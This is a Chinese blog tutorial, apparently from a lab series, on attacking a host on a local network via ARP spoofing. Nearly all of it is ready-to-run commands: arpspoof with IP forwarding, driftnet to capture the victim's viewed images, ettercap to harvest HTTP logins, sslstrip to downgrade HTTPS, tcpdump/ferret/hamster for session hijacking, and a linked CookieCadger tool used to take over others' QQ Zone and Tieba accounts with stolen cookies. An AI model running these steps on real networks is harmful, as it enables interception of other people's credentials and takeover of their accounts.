62.利用arp欺骗来攻击局域网内主机(driftnet、ett
2018-10-09 本文已影响0人
扶桑啊啊
前情回顾——ARP攻击:https://www.jianshu.com/p/55f15585cc1a
可利用arp欺骗攻击局域网内的主机
一、获取靶机浏览的图片
1.arp欺骗攻击
2.driftnet 获取本机网卡的图片
echo 1 > /proc/sys/net/ipv4/ip_forward //冒充过程
arpspoof -i eth0 -t 192.168.252.131 192.168.252.2 //欺骗攻击
driftnet -i eth0
打开driftnet来记录靶机浏览过的图片
![](https://img.haomeiwen.com/i8685807/56055dd69d340ce0.png)
二、获取靶机http登录账号密码
1.arp欺骗攻击
2.ettercap截取http认证的登录账号与密码
echo 1 > /proc/sys/net/ipv4/ip_forward //冒充过程
arpspoof -i eth0 -t 192.168.252.131 192.168.252.2 //欺骗攻击
ettercap -Tq -i eth0 //-T 启动文本模式,-q 静默模式,-i 网卡
参考:https://blog.csdn.net/zc19930620/article/details/61642372
三、获取靶机https登录账号密码
1.修改ettercap配置文件
vim /etc/ettercap/etter.conf
找到#if you use iptables:后面的两个#去掉
![](https://img.haomeiwen.com/i8685807/5b36f49907e222e0.png)
2.将https转为http(此方法只对ie浏览器有效,火狐浏览器会自动过滤,因为我没有ie浏览器,就不做示例了)
sslstrip -a -f -k
3.重复2的过程即可
四、会话劫持
1.arp欺骗
2.tcpdump抓包,保存数据(wireshark也可以)
3.ferret分析数据,重新生成抓包的文件
4.hamster重放流量
echo 1 > /proc/sys/net/ipv4/ip_forward //冒充过程
arpspoof -i eth0 -t 192.168.252.131 192.168.252.2 //欺骗攻击
tcpdump -i eth0 -A host 192.168.252.131 -w tmp.cap
ferret -r tmp.cap
hamster
![](https://img.haomeiwen.com/i8685807/686fdccd7a095225.png)
![](https://img.haomeiwen.com/i8685807/0926c8114218b119.png)
修改火狐浏览器代理
![](https://img.haomeiwen.com/i8685807/80ac7ddb361a8300.png)
在浏览器中输入127.0.0.1:1234,打开hamster,用adapters来选择网卡
![](https://img.haomeiwen.com/i8685807/e59c2740170c2d8a.png)
![](https://img.haomeiwen.com/i8685807/e8848838dd783bbf.png)
五、会话劫持——一键劫持
使用工具CookieCadger-1.08.jar(同一个局域网主机)
下载地址:链接:https://pan.baidu.com/s/1YDmuyC0rspR4Wa41eAOF9w
提取码:pyxd
这个jar小程序,在windows和kali下都可以使用,我在kali下使用的。
java -jar CookieCadger-1.08.jar
![](https://img.haomeiwen.com/i8685807/5664ac18ba5b8722.png)
运行软件之后,靶机(192.168.252.131)登录QQ空间和百度贴吧之后,会自动保存cookie。
在软件上找到带cookie的网址后可直接进入别人的空间。
![](https://img.haomeiwen.com/i8685807/cbffe5a95964cd29.png)